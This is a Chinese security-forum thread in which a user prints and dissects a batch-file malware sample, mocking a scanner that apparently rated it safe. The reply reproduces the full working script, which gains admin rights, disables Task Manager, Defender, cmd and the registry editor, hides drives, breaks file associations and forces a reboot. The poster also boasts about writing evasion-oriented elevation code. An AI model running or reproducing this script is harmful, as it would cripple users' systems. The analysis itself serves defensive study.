楼主: xiaohuangbo
收起左侧

[病毒样本] 微步的新概念“安全” (1x)

  [复制链接]
sichuanwenxuan
发表于 2022-1-24 18:02:26 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kdXiaoyi
发表于 2022-1-24 18:10:22 | 显示全部楼层
判定改了
以后这种情况多刷新几下

[url=https://fj.kafan.cn/attachment/forum/202201/24/180944ryuy2x4xxagxgza9.png][/url]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kdXiaoyi
发表于 2022-1-24 18:37:33 | 显示全部楼层
简单看看代码
  1. [url=home.php?mod=space&uid=331734]@echo[/url] off 2>nul 3>nul
  2. set /a _Debug=0
  3. ::==========================================
  4. :: 获取管理员权限
  5. set _Args=%*
  6. if "%~1" NEQ "" (
  7.   set _Args=%_Args:"=%
  8. )
  9. fltmc 1>nul 2>nul || (
  10.   cd /d "%~dp0"
  11.   cmd /u /c echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~dp0"" && ""%~dpnx0"" ""%_Args%""", "", "runas", 1 > "%temp%\GetAdmin.vbs"
  12.   "%temp%\GetAdmin.vbs"
  13.   del /f /q "%temp%\GetAdmin.vbs" 1>nul 2>nul
  14.   exit
  15. )
  16. ::==========================================
  17. @Echo off
  18. %1(start /min cmd.exe /c %0 :&exit)
  19. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  20. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d "1" /f
  21. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d "1" /f
  22. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d "1" /f
  23. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
  24. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
  25. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d "1" /f
  26. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HidePowerOptions" /t REG_DWORD /d "1" /f
  27. reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  28. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d "1" /f
  29. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewOnDrive" /t REG_DWORD /d "67108863" /f
  30. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d "67108863" /f
  31. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDesktop" /t REG_DWORD /d "1" /f
  32. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{088e3905-0323-4b02-9826-5d99428e115f}" /f
  33. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}" /f
  34. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}" /f
  35. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{d3162b92-9365-467a-956b-92703aca08af}" /f
  36. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}" /f
  37. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" /f
  38. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}" /f
  39. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /t REG_DWORD /d "1" /f
  40. reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
  41. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "2" /f
  42. reagentc /disable
  43. assoc .exe=txtfile
  44. assoc .txt=exefile
  45. assoc .mp3=txtfile
  46. assoc .flv=txtfile
  47. assoc .swf=txtfile
  48. assoc .fla=txtfile
  49. assoc .jpg=txtfile
  50. assoc .bmp=txtfile
  51. assoc .zip=txtfile
  52. assoc .7z=txtfile
  53. assoc .rar=txtfile
  54. assoc .tag=txtfile
  55. assoc .jpge=txtfile
  56. assoc .mp4=txtfile
  57. assoc .3gp=txtfile
  58. assoc .avi=txtfile
  59. assoc .wav=txtfile
  60. assoc .htm=txtfile
  61. assoc .html=txtfile
  62. assoc .vbs=txtfile
  63. assoc .vbe=txtfile
  64. assoc .js=txtfile
  65. assoc .rxproj=txtfile
  66. assoc .mdb=txtfile
  67. assoc .dll=txtfile
  68. assoc .dat=txtfile
  69. assoc .sys=txtfile
  70. assoc .wmv=txtfile
  71. assoc .ogg=txtfile
  72. assoc .db=txtfile
  73. assoc .mid=txtfile
  74. assoc .gif=txtfile
  75. assoc .png=txtfile
  76. assoc .doc=txtfile
  77. assoc .exl=txtfile
  78. assoc .pdf=txtfile
  79. assoc .chm=txtfile
  80. assoc .nfo=txtfile
  81. assoc .bat=txtfile
  82. assoc .com=txtfile
  83. assoc .cmd=txtfile
  84. shutdown -r -t 0
  85. exit
复制代码
85行,从REG和ASSOC两方面搞系统之后关机……
只要平常把这个设置开启,就会爆提示

这个UAC的签名验证也真是……
Mic收购Bugjump之后就开始学习Bugjump……搞一堆BUG出来
《已验证的发布者:微软》

还有那个获取管理员,一看就是抄的作业
看看我写的

也不是说他写的好,就是说他写的多释放一个文件,增加查杀率
而且我写,我还这样写

增加免杀率的同时搞崩分析者心态

吐槽完毕,看看行为

用注册表锁掉各种实用工具和功能(任务管理器、锁屏功能、禁止改密码之类的)
还隐藏此电脑里面的盘符、桌面

还恶心的删掉此电脑里面的固有图标
让此电脑里面变成空白

之后叕禁用cmd和注册表编辑器
但作者可闻之,有个程序叫command.com(被微软削掉了,但是可以在程序与功能里面启用,好像叫NTD啥的)
之后又是熟悉的改关联(他甚至改掉了.com的关联)

重启跑路(bushi

确实挺“安全”的呀~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-19 17:28 , Processed in 0.104803 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表